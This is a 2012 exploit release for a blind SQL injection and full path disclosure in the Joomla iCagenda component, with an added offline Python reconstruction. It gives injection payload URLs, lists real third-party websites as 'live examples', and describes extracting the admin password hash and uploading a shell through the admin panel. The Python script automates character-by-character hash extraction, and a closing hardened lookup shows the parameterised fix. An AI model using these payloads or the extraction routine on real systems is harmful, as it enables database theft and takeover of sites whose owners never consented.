2012-08-31

# Exploit Title: Joomla Component (com_icagenda) Blind SQLi / Full Path Disclosure
# Date: 31 August 2012
# Author: Dark-Puzzle (Souhail Hammou)
# Risk : Critical
# Version: All Versions
# Google Dork : N/A
# Category: Webapps/0day
# Tested on: Windows XP SP2 (French)
# Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ...
***************************************************************************************
Info :

Icagenda is a Joomla component for event management that ships with a calendar module.
----------------------------------------------------
I - Blind SQL Injection Vulnerability
----------------------------------------------------

Vulnerability :

The "id" parameter of com_icagenda (view=list&layout=event) is used in a database query without sanitisation and is vulnerable to blind (boolean-based) SQL injection. No error message is returned; instead the attacker appends a condition to the id value and compares the two responses: when the injected condition is true the event content is displayed, when it is false the content disappears. By sending a series of such true/false queries an attacker can extract arbitrary data from the database one bit at a time.
The difference between the two responses below (content shown vs. content hidden) is what indicates the blind SQL injection.

Example :

www.hackme.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 (True)
www.hackme.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 (False)

Live Example :

http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 (True) --> content is displayed
http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 (False) --> content is not displayed

Other Live Examples :

http://www.brie-danse.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=133&id=3 and 1=2 (False) --> Blind Injection
http://www.cocdklive.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=107&id=1 and 1=2 (False) --> Blind Injection

ADMIN PANEL : http://target/administrator
Once the administrator credentials (username and password hash from the users table) have been extracted through the injection, an attacker can log in to the administrator panel and upload a shell from there.
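To show how the true/false responses above turn into actual data extraction, here is an added example; it is not code from the iCagenda component or from the advisory. It reconstructs the vulnerable pattern the advisory describes (the id value concatenated straight into the query) against a constructed in-memory SQLite database, treats "content displayed / content hidden" as a yes/no oracle, and recovers a value from a hypothetical jos_users table one character at a time by binary search. The table and column names, the sample rows and the query shape are assumptions; the real component runs on MySQL, where unicode() would be ascii(). The hardened lookup at the end casts the id to an integer and binds it as a parameter, so the same payload returns nothing.

```python
"""Boolean-based blind SQL injection, worked offline.

Added example, not code from the iCagenda component or the advisory.
The database, table and column names and the sample rows are constructed
stand-ins (assumption: a Joomla-style jos_users table holds the hashes).
"""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE jos_icagenda_events (id INTEGER, title TEXT);
    INSERT INTO jos_icagenda_events VALUES (1, 'Kickoff meeting');
    CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT);
    INSERT INTO jos_users VALUES (62, 'admin', 'd41d8cd98f00b204e9800998ecf8427e');
""")

QUERIES = {"count": 0}  # how many requests the extraction costs


def vulnerable_lookup(event_id: str):
    """Hypothetical reconstruction of the flaw: the id parameter is
    concatenated into the query unfiltered, so 'id=1 and 1=2' hides the event."""
    sql = "SELECT title FROM jos_icagenda_events WHERE id=" + event_id
    return conn.execute(sql).fetchone()


def fixed_lookup(event_id: str):
    """Hardened form: cast to int first, then bind as a parameter."""
    try:
        clean_id = int(event_id)
    except ValueError:
        return None
    return conn.execute(
        "SELECT title FROM jos_icagenda_events WHERE id=?", (clean_id,)
    ).fetchone()


def oracle(condition: str) -> bool:
    """One 'request': True when content is displayed (the condition held)."""
    QUERIES["count"] += 1
    return vulnerable_lookup(f"1 and ({condition})") is not None


def extract_int(expr: str, lo: int = 0, hi: int = 255) -> int:
    """Recover an integer-valued SQL expression (0..255) by binary search,
    using only the yes/no answers of the oracle: about 8 requests per value."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(expr: str) -> str:
    """Recover a string-valued SQL expression character by character.
    SQLite's unicode() plays the role of MySQL's ascii()."""
    length = extract_int(f"length(({expr}))")
    return "".join(
        chr(extract_int(f"unicode(substr(({expr}),{i},1))"))
        for i in range(1, length + 1)
    )


# Subquery whose result the attacker wants: the admin password hash.
ADMIN_HASH = "SELECT password FROM jos_users WHERE username='admin'"

if __name__ == "__main__":
    print("id=1 and 1=1 ->", vulnerable_lookup("1 and 1=1"))
    print("id=1 and 1=2 ->", vulnerable_lookup("1 and 1=2"))
    print("hardened     ->", fixed_lookup("1 and 1=1"))
    print("extracted    :", extract_string(ADMIN_HASH),
          "in", QUERIES["count"], "queries")
```

Each character costs roughly eight true/false requests, which is why a 32-character hash is recovered in a few hundred page loads even though no data is ever echoed back. On the defensive side the difference is the cast and the bound parameter in fixed_lookup: "1 and 1=1" is not an integer, so it never reaches the database.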

-----------------------------------------------------
II - Full Path Disclosure Vulnerability
-----------------------------------------------------
The full installation path can be disclosed by passing the Itemid or id parameter as an array (Itemid[]= or id[]=). The component expects a scalar value, so PHP raises a warning ("... expects parameter 1 to be string, array given in /path/to/file.php on line N"), and when error display is enabled that warning, including the absolute path of the script, is printed in the page.

Live Examples :
http://www.cocdklive.com/index.php?option=com_icagenda&view=list&layout=event&Itemid[]=107&id=1
http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1

# Datasec Team

//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
